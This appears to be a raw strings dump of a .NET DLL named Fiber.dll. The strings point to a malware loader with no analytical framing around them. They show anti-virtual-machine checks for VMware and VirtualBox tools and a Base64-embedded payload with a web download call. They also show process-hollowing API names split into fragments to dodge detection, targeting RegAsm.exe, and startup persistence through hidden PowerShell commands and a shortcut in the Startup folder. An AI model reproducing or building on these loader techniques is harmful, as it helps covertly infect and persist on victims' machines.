!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<>p__0
string_0
intptr_0
object_0
uint_0
DD22222220000000011111
<>p__1
intptr_1
object_1
IEnumerable`1
CallSite`1
Class1
kernel32
ToUInt32
ToInt32
<>p__2
smethod_2
object_2
Action`2
<>p__3
Func`3
PayloadEmBase64
<>p__4
smethod_4
Func`4
<>p__5
ToInt16
<>p__6
smethod_6
<>p__7
get_UTF8
<>p__8
<>p__9
smethod_9
<Module>
LoadLibraryA
BrKxOILebBmfeOUlbp
ODzJXYhOUvC
yeWiOZppNopqROkgUoNjtHfCCOWOyD
System.IO
nIMsmqTTZwPKNRDgHNLTmYWWeNGMO
mdSwlcnvkMPLZnQwokjDlSHvLUmGRQ
NetFrameWorkMaconha
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
GetProcessById
bytesRead
thread
AntiVmMethod
Replace
EndInvoke
BeginInvoke
Enumerable
RuntimeTypeHandle
GetTypeFromHandle
handle
set_WindowStyle
ProcessWindowStyle
set_FileName
applicationName
get_ProcessName
commandLine
CheckForVirtualMachine
ValueType
System.Core
MyClose
Reverse
Create
MulticastDelegate
CallSite
GuidAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
ObfuscationAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
YanoAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
get_Size
bufferSize
SizeOf
set_Encoding
System.Runtime.Versioning
FromBase64String
DownloadString
ToString
GetString
length
AsyncCallback
callback
Marshal
Fiber.dll
ixLUbUbLGOhPzYGnlUDhIqCIwKdeGm
AntiVm
System
bytesWritten
Version
processInformation
Interaction
System.Reflection
Exception
startupInfo
CSharpArgumentInfo
set_StartInfo
ProcessStartInfo
Microsoft.CSharp
System.Linq
aPkTmDDkWyC
UBxQLHJPsbfDCPPHZr
InvokeMember
SetMember
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
Buffer
buffer
GetDelegateForFunctionPointer
BitConverter
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
inheritHandles
GetProcesses
threadAttributes
processAttributes
GetBytes
creationFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Contains
Process
process
GetProcAddress
address
set_Arguments
Exists
Concat
CreateObject
object
protect
System.Net
Target
IAsyncResult
result
WebClient
Environment
environment
Convert
System.Text
context
ToArray
BlockCopy
currentDirectory
op_Equality
Lrrtfc
dRrgPxHpIcGUMcCRvWQdnv
WrapNonExceptionThrows
Copyright
2023
$0ea17cfe-3a6f-4f25-be74-3b106db3e3e6
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
StripAfterObfuscation
_CorDllMain
mscoree.dll
@&H@&#
vmtoolsd
VBoxService
@Thread
Resume
Wow64Set%
ThreadContext
+adContext
SetThre
kernel32
Wow64GetThreadContext
#ontext
GetThreadC
qllocEx
VirtualA
WritePro@
cessMemory
!ssMemory
ReadProce
#ewOfSection
ZwUnmapVi
Create&
ProcessA
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
-WindowStyle Hidden Copy-Item -Path *.vbs -Destination
WScript.Shell
SpecialFolders
Startup
CreateShortcut
IconLocation
C:\Windows\System32\shell32.dll,
TargetPath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WorkingDirectory
WindowStyle
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process
Arguments
Description
Microsoft
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
1.0.15.0
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Fiber.dll
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
Fiber.dll
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0